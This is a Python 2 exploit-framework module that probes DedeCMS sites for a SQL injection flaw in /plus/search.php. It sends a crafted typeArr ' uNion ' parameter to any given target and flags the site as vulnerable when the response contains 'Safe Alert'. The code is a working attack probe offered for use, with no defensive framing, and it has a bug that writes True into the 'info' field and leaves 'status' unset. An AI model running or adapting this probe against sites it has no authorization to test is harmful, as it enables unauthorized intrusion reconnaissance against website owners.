#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date:   2016-09-20 15:34:41
# @Last Modified by:   Lcy
# @Last Modified time: 2016-09-21 10:42:39
import urllib2
class Exploit:
    def __init__(self,target,expfile):
        self.target = target
        self.result = {
            "name": "DeDeCMS search.php 注入漏洞",
            "author": "Lcy",
            "type": "website",
            "ref": "https://phpinfo.me",
            "status":False,
            "info":"",
            'filename':expfile+ ".py",
            "target":target,
        }
    def verify(self):
        file_path = "/plus/search.php?keyword=as&typeArr[%20uNion%20]=a"
        try:
            file_url = self.target+file_path
            req = urllib2.Request(file_url)
            res = urllib2.urlopen(req,timeout=3)
            file_content = res.read()
            if "Safe Alert" in file_content:
                self.result['info'] = True
                self.result['info'] = "目标%s存在dedecms search.php注入漏洞" % file_url
        except Exception,e :
            pass
       